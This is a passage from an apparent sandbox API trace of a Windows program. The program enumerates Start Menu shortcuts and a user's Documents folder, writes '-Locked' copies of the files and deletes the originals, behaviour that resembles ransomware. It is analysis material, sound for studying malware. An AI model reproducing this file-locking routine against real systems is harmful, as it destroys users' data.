| out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3672e79, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97362eb5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9ee2becc, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.026] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x23bf23db, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x23bf23db, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x23bf23db, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x355, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0299.026] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x895, dwReserved0=0x0, dwReserved1=0x0, cFileName="Devices Flow.lnk", cAlternateFileName="")) returned 1 [0299.027] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c425ce, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91c425ce, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91c73351, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0299.027] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x92d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Immersive Control Panel.lnk", cAlternateFileName="")) returned 1 [0299.027] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0299.027] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2016 Tools", cAlternateFileName="MICROS~1")) returned 1 [0299.028] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x1a440bee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a440bee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a440bee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiracastView.lnk", cAlternateFileName="")) returned 1 [0299.028] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9856516c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9856516c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98566539, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0299.028] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9875e8e4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9875e8e4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9875faea, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x989, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0299.029] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9887255b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9887255b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x988738f2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0299.029] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989fca23, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x989fca23, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x989fde6b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0299.029] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x502baba5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x502baba5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x502baba5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x897, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintDialog.lnk", cAlternateFileName="")) returned 1 [0299.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98bdb45f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98bdb45f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98bdc5e8, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x991, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher 2016.lnk", cAlternateFileName="PUBLIS~1.LNK")) returned 1 [0299.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x2007da5a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2007da5a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2007da5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.lnk", cAlternateFileName="")) returned 1 [0299.030] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98d3e739, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98d3e739, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98d3faa2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Skype for Business 2016.lnk", cAlternateFileName="SKYPEF~1.LNK")) returned 1 [0299.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartUp", cAlternateFileName="")) returned 1 [0299.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x370b7e7, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x370b7e7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0299.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x6ec87d0d, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6ec87d0d, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0299.031] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5a53, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0299.032] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98de5a53, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98de5a53, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 0 [0299.032] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.032] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked", lpFilePart=0x0) returned 0x4b [0299.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.032] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\access 2016.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.036] GetFileType (hFile=0x498) returned 0x1 [0299.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.036] GetFileType (hFile=0x498) returned 0x1 [0299.038] CloseHandle (hObject=0x498) returned 1 [0299.038] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk", lpFilePart=0x0) returned 0x44 [0299.039] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Access 2016.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\access 2016.lnk")) returned 1 [0299.041] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked", lpFilePart=0x0) returned 0x47 [0299.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.041] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.042] GetFileType (hFile=0x498) returned 0x1 [0299.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.042] GetFileType (hFile=0x498) returned 0x1 [0299.045] CloseHandle (hObject=0x498) returned 1 [0299.046] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini", lpFilePart=0x0) returned 0x40 [0299.046] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.ini")) returned 1 [0299.048] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked", lpFilePart=0x0) returned 0x47 [0299.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.048] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk-Locked" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.lnk-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x498 [0299.050] GetFileType (hFile=0x498) returned 0x1 [0299.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.050] GetFileType (hFile=0x498) returned 0x1 [0299.053] CloseHandle (hObject=0x498) returned 1 [0299.054] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk", lpFilePart=0x0) returned 0x40 [0299.054] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Desktop.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\desktop.lnk")) returned 0 [0299.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0299.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0299.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpFilePart=0x0) returned 0x20 [0299.062] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.062] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4e6a95a, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4e6a95a, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.063] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a56730, ftCreationTime.dwHighDateTime=0x1d7b281, ftLastAccessTime.dwLowDateTime=0x54e022b0, ftLastAccessTime.dwHighDateTime=0x1d7b7f3, ftLastWriteTime.dwLowDateTime=0x54e022b0, ftLastWriteTime.dwHighDateTime=0x1d7b7f3, nFileSizeHigh=0x0, nFileSizeLow=0x8fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="1FEg.xlsx", cAlternateFileName="1FEG~1.XLS")) returned 1 [0299.063] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7862a0f0, ftCreationTime.dwHighDateTime=0x1d76dca, ftLastAccessTime.dwLowDateTime=0xef8d05d0, ftLastAccessTime.dwHighDateTime=0x1d7d1ed, ftLastWriteTime.dwLowDateTime=0xef8d05d0, ftLastWriteTime.dwHighDateTime=0x1d7d1ed, nFileSizeHigh=0x0, nFileSizeLow=0xa062, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XKT2 -erD.pptx", cAlternateFileName="2XKT2-~1.PPT")) returned 1 [0299.064] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ac59330, ftCreationTime.dwHighDateTime=0x1d7891f, ftLastAccessTime.dwLowDateTime=0xdd2e7840, ftLastAccessTime.dwHighDateTime=0x1d7e491, ftLastWriteTime.dwLowDateTime=0xdd2e7840, ftLastWriteTime.dwHighDateTime=0x1d7e491, nFileSizeHigh=0x0, nFileSizeLow=0x15b9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4 yebkiYbIGx.xlsx", cAlternateFileName="4YEBKI~1.XLS")) returned 1 [0299.064] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c953f60, ftCreationTime.dwHighDateTime=0x1d7db38, ftLastAccessTime.dwLowDateTime=0xcb671260, ftLastAccessTime.dwHighDateTime=0x1d7e762, ftLastWriteTime.dwLowDateTime=0xcb671260, ftLastWriteTime.dwHighDateTime=0x1d7e762, nFileSizeHigh=0x0, nFileSizeLow=0x698b, dwReserved0=0x0, dwReserved1=0x0, cFileName="4GH0Y9.pdf", cAlternateFileName="")) returned 1 [0299.064] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8a9bec0, ftCreationTime.dwHighDateTime=0x1d791d6, ftLastAccessTime.dwLowDateTime=0x79866d90, ftLastAccessTime.dwHighDateTime=0x1d7bc44, ftLastWriteTime.dwLowDateTime=0x79866d90, ftLastWriteTime.dwHighDateTime=0x1d7bc44, nFileSizeHigh=0x0, nFileSizeLow=0x15af6, dwReserved0=0x0, dwReserved1=0x0, cFileName="88Z1o5.docx", cAlternateFileName="88Z1O5~1.DOC")) returned 1 [0299.065] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e0d8b60, ftCreationTime.dwHighDateTime=0x1d786ac, ftLastAccessTime.dwLowDateTime=0x75f01630, ftLastAccessTime.dwHighDateTime=0x1d7c4f1, ftLastWriteTime.dwLowDateTime=0x75f01630, ftLastWriteTime.dwHighDateTime=0x1d7c4f1, nFileSizeHigh=0x0, nFileSizeLow=0x9f76, dwReserved0=0x0, dwReserved1=0x0, cFileName="9wui5eVHXPKhOlhGPv40.docx", cAlternateFileName="9WUI5E~1.DOC")) returned 1 [0299.065] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81594920, ftCreationTime.dwHighDateTime=0x1d77d10, ftLastAccessTime.dwLowDateTime=0xcc1963c0, ftLastAccessTime.dwHighDateTime=0x1d7dce0, ftLastWriteTime.dwLowDateTime=0xcc1963c0, ftLastWriteTime.dwHighDateTime=0x1d7dce0, nFileSizeHigh=0x0, nFileSizeLow=0x3f02, dwReserved0=0x0, dwReserved1=0x0, cFileName="awNrFZy3e3qK1nkjdW.pptx", cAlternateFileName="AWNRFZ~1.PPT")) returned 1 [0299.065] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5ddeb60, ftCreationTime.dwHighDateTime=0x1d7e31a, ftLastAccessTime.dwLowDateTime=0x52067400, ftLastAccessTime.dwHighDateTime=0x1d7e691, ftLastWriteTime.dwLowDateTime=0x52067400, ftLastWriteTime.dwHighDateTime=0x1d7e691, nFileSizeHigh=0x0, nFileSizeLow=0x8e54, dwReserved0=0x0, dwReserved1=0x0, cFileName="azYkAGkUGGsOX2bnL.rtf", cAlternateFileName="AZYKAG~1.RTF")) returned 1 [0299.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x124bfc90, ftCreationTime.dwHighDateTime=0x1d75a8c, ftLastAccessTime.dwLowDateTime=0x789dae40, ftLastAccessTime.dwHighDateTime=0x1d78e70, ftLastWriteTime.dwLowDateTime=0x789dae40, ftLastWriteTime.dwHighDateTime=0x1d78e70, nFileSizeHigh=0x0, nFileSizeLow=0x13330, dwReserved0=0x0, dwReserved1=0x0, cFileName="bf c.docx", cAlternateFileName="BFC~1.DOC")) returned 1 [0299.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900ad8f0, ftCreationTime.dwHighDateTime=0x1d772eb, ftLastAccessTime.dwLowDateTime=0xeb1dfd90, ftLastAccessTime.dwHighDateTime=0x1d797f2, ftLastWriteTime.dwLowDateTime=0xeb1dfd90, ftLastWriteTime.dwHighDateTime=0x1d797f2, nFileSizeHigh=0x0, nFileSizeLow=0x18c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="cERxr1OfWdsXa.xlsx", cAlternateFileName="CERXR1~1.XLS")) returned 1 [0299.066] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4372e947, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0299.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x608545e0, ftCreationTime.dwHighDateTime=0x1d7ac5a, ftLastAccessTime.dwLowDateTime=0xcb9395a0, ftLastAccessTime.dwHighDateTime=0x1d7e56a, ftLastWriteTime.dwLowDateTime=0xcb9395a0, ftLastWriteTime.dwHighDateTime=0x1d7e56a, nFileSizeHigh=0x0, nFileSizeLow=0x2165, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUnC2MDENVIC3bG6_9q.xlsx", cAlternateFileName="EUNC2M~1.XLS")) returned 1 [0299.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd9f4e00, ftCreationTime.dwHighDateTime=0x1d7826b, ftLastAccessTime.dwLowDateTime=0x77b84c80, ftLastAccessTime.dwHighDateTime=0x1d7d0f9, ftLastWriteTime.dwLowDateTime=0x77b84c80, ftLastWriteTime.dwHighDateTime=0x1d7d0f9, nFileSizeHigh=0x0, nFileSizeLow=0x228a, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQNOqAqIU_64xnNqSNa.xlsx", cAlternateFileName="FQNOQA~1.XLS")) returned 1 [0299.067] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1311e800, ftCreationTime.dwHighDateTime=0x1d7de8b, ftLastAccessTime.dwLowDateTime=0x1815fb40, ftLastAccessTime.dwHighDateTime=0x1d7df15, ftLastWriteTime.dwLowDateTime=0x1815fb40, ftLastWriteTime.dwHighDateTime=0x1d7df15, nFileSizeHigh=0x0, nFileSizeLow=0xcf74, dwReserved0=0x0, dwReserved1=0x0, cFileName="fUkbCywvnkWTcZgPOjsY.ppt", 